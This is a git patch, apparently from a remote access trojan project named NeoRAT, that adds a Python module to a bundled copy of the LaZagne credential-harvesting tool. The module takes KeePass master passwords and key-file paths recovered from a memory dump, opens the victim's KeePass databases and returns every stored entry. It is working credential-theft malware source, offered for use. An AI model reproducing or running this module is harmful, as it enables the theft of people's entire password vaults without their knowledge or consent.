From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/memory/keepass.py            | 31 ++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/memory/keepass.py

(limited to 'foreign/client_handling/lazagne/softwares/memory/keepass.py')

diff --git a/foreign/client_handling/lazagne/softwares/memory/keepass.py b/foreign/client_handling/lazagne/softwares/memory/keepass.py
new file mode 100644
index 0000000..4df5b84
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/memory/keepass.py
@@ -0,0 +1,31 @@
+# -*- coding: utf-8 -*- 
+# Thanks to the awesome work done by harmjoy
+# For more information http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
+
+# Thanks for the great work of libkeepass (used to decrypt keepass file)
+# https://github.com/phpwutz/libkeepass
+
+import traceback
+
+from . import libkeepass
+from foreign.client_handling.lazagne.config.constant import constant
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+
+
+class Keepass(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'keepass', 'memory')
+
+    def run(self):
+        # password found on the memory dump class
+        if constant.keepass:
+            res = []
+            for db in constant.keepass:
+                try:
+                    with libkeepass.open(db.values()[0][u'Database'],
+                                         password=db.get(u"KcpPassword", {}).get(u'Password'),
+                                         keyfile=db.get(u"KcpKeyFile", {}).get(u'KeyFilePath')) as kdb:
+                        res.extend(kdb.to_dic())
+                except Exception:
+                    self.debug(traceback.format_exc())
+            return res
-- 
cgit v1.2.3